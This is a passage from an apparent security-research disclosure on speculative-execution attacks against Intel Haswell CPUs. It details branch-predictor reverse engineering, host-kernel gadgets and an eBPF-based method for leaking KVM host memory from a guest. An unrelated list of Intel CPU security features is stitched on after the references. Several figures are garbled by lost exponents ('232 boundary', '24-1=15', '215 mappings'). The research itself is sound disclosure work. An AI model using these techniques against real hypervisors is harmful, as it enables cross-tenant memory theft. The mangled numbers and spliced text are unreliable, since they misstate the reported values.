Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

 

  • The low 12 bits of the address of the source instruction (we are not sure whether it’s the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

 

If the indirect call predictor can’t resolve a branch, it is resolved by the generic predictor instead. Intel’s optimization manual hints at this behavior: «Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior.»

 

The branch history buffer (BHB) stores information about the last 29 taken branches — basically a fingerprint of recent control flow — and is used to allow better prediction of indirect calls that can have multiple targets.

 

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

 

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
 *bhb_state <<= 2;
 *bhb_state ^= (dst & 0x3f);
 *bhb_state ^= (src & 0xc0) >> 6;
 *bhb_state ^= (src & 0xc00) >> (10 — 2);
 *bhb_state ^= (src & 0xc000) >> (14 — 4);
 *bhb_state ^= (src & 0x30) << (6 — 4);
 *bhb_state ^= (src & 0x300) << (8 — 8);
 *bhb_state ^= (src & 0x3000) >> (12 — 10);
 *bhb_state ^= (src & 0x30000) >> (16 — 12);
 *bhb_state ^= (src & 0xc0000) >> (18 — 14);
}

 

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn’t been understood yet.

 

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code — for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn’t keep a detailed record of what we were doing.

 

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked — however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

 

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

 

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to «recent program behavior» in Intel’s optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

 

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

 

 

 

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

 

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

 

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

 

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don’t influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn’t influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

 

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn’t store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

 

However, a history buffer needs to «forget» about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards — and given that, upwards combination of information probably wouldn’t be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

 

 

 

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

 

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

 

  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

 

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

 

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

 

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section «Reverse-Engineering Branch Predictor Internals», using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

 

 

 

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) — by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

 

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

 

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section «Generic Predictor» apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.

 

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.

 

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux  are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won’t actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

 

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they’re probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

 

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used — R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

 

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

 

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

 

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

 

To brute-force the physical address, the following gadget can be used:

 

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

 

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 — the physical address guess minus 0xf8 — is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel — while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel’s text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

 

The eBPF interpreter entry point has the following function signature:

 

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

 

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed — which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn’t matter.

 

The eBPF interpreter provides, among other things:

 

  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

 

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

 

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

 

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.

Variant 3: Rogue data cache load

 

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

 

We do have a few additions to make to Anders Fogh’s blogpost:

 

«Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, […]»

 

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

 

«First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1.»

 

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

 

«Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed.»

 

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost — it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical — in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

 

The same might work for cache sets — use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

 

The source address aliasing would reduce the usefulness somewhat, but because target addresses don’t suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

 

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

 

  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

 

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn’t lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn’t reloaded before the return instruction).

 

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven’t been able to make it work.

Vendor statements

The following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:

Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

For more information and links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

 

Specific details regarding the affected processors and mitigations can be found at this website:https://developer.arm.com/support/security-update

 

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents — in particular Intel’s documentation — change over time, so quotes from and references to it may not reflect the latest version of Intel’s documentation.

 

  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel’s optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • «Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems.»
    • «Loads can:[…]Be carried out speculatively, before preceding branches are resolved.»
    • «Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition.»
    • «if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches»
    • «Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch).»
  • https://software.intel.com/en-us/articles/intel-sdm: Intel’s Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog’s documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm’s research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D’Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel’s Ivy Bridge architecture.

References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh’s work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section «Tested Processors». The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won’t work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available athttp://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpgReleasePackages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 215 mappings would be more efficient, but the kernel places a hard cap of 216 on the number of VMAs that a process can have.
[10] Intel’s optimization manual states that «In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor», so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn’t seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin — in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn’t a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.

Intel CPU security features

List of Intel CPU security features along with short descriptions taken from the Intel manuals.

WP (Write Protect) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR0.WP allows pages to be protected from supervisor-mode writes. If CR0.WP = 0, supervisor-mode write accesses are allowed to linear addresses with read-only access rights; if CR0.WP = 1, they are not (User-mode write accesses are never allowed to linear addresses with read-only access rights, regardless of the value of CR0.WP).

Interesting links:

NXE/XD (No-Execute Enable/Execute Disable) (PDF)

Regarding IA32_EFER MSR and NXE (Volume 3A, 4-3, Paragraph 4.1.3):

IA32_EFER.NXE enables execute-disable access rights for PAE paging and IA-32e paging. If IA32_EFER.NXE = 1, instructions fetches can be prevented from specified linear addresses (even if data reads from the addresses are allowed).

IA32_EFER.NXE has no effect with 32-bit paging. Software that wants to use this feature to limit instruction fetches from readable pages must use either PAE paging or IA-32e paging.

Regarding XD (Volume 3A, 4-17, Table 4-11):

If IA32_EFER.NXE = 1, execute-disable (if 1, instruction fetches are not allowed from the 4-KByte page controlled by this entry; see Section 4.6); otherwise, reserved (must be 0).

SMAP (Supervisor Mode Access Protection) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMAP allows pages to be protected from supervisor-mode data accesses. If CR4.SMAP = 1, software operating in supervisor mode cannot access data at linear addresses that are accessible in user mode. Software can override this protection by setting EFLAGS.AC.

SMEP (Supervisor Mode Execution Protection) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMEP allows pages to be protected from supervisor-mode instruction fetches. If CR4.SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode.

MPX (Memory Protection Extensions) (PDF)

Intel MPX introduces new bounds registers and new instructions that operate on bounds registers. Intel MPX allows an OS to support user mode software (operating at CPL = 3) and supervisor mode software (CPL < 3) to add memory protection capability against buffer overrun. It provides controls to enable Intel MPX extensions for user mode and supervisor mode independently. Intel MPX extensions are designed to allow software to associate bounds with pointers, and allow software to check memory references against the bounds associated with the pointer to prevent out of bound memory access (thus preventing buffer overflow).

Interesting links:

SGX (Software Guard Extensions) (PDF)

These extensions allow an application to instantiate a protected container, referred to as an enclave. An enclave is a protected area in the application’s address space (see Figure 1-1), which provides confidentiality and integrity even in the presence of privileged malware. Accesses to the enclave memory area from any software not resident in the enclave are prevented.

Interesting links:

Protection keys (PDF)

Quoting Volume 3A, 4-31, Paragraph 4.6.2:

The protection-key feature provides an additional mechanism by which IA-32e paging controls access to user-mode addresses. When CR4.PKE = 1, every linear address is associated with the 4-bit protection key located in bits 62:59 of the paging-structure entry that mapped the page containing the linear address. The PKRU register determines, for each protection key, whether user-mode addresses with that protection key may be read or written.

The following paragraphs, taken from LWN, shed some light on the purpose of memory protection keys:

One might well wonder why this feature is needed when everything it does can be achieved with the memory-protection bits that already exist. The problem with the current bits is that they can be expensive to manipulate. A change requires invalidating translation lookaside buffer (TLB) entries across the entire system, which is bad enough, but changing the protections on a region of memory can require individually changing the page-table entries for thousands (or more) pages. Instead, once the protection keys are set, a region of memory can be enabled or disabled with a single register write. For any application that frequently changes the protections on regions of its address space, the performance improvement will be large.

There is still the question (as asked by Ingo Molnar) of just why a process would want to make this kind of frequent memory-protection change. There would appear to be a few use cases driving this development. One is the handling of sensitive cryptographic data. A network-facing daemon could use a cryptographic key to encrypt data to be sent over the wire, then disable access to the memory holding the key (and the plain-text data) before writing the data out. At that point, there is no way that the daemon can leak the key or the plain text over the wire; protecting sensitive data in this way might also make applications a bit more resistant to attack.

Another commonly mentioned use case is to protect regions of data from being corrupted by «stray» write operations. An in-memory database could prevent writes to the actual data most of the time, enabling them only briefly when an actual change needs to be made. In this way, database corruption due to bugs could be fended off, at least some of the time. Ingo was unconvinced by this use case; he suggested that a 64-bit address space should be big enough to hide data in and protect it from corruption. He also suggested that a version of mprotect() that optionally skipped TLB invalidation could address many of the performance issues, especially if huge pages were used. Alan Cox responded, though, that there is real-world demand for the ability to change protection on gigabytes of memory at a time, and that mprotect() is simply too slow.

CET (Control-flow Enforcement Technology) (PDF)

Control-flow Enforcement Technology (CET) provides the following capabilities to defend against ROP/JOP style control-flow subversion attacks:

  • Shadow Stack – return address protection to defend against Return Oriented Programming,
  • Indirect branch tracking – free branch protection to defend against Jump/Call Oriented Programming.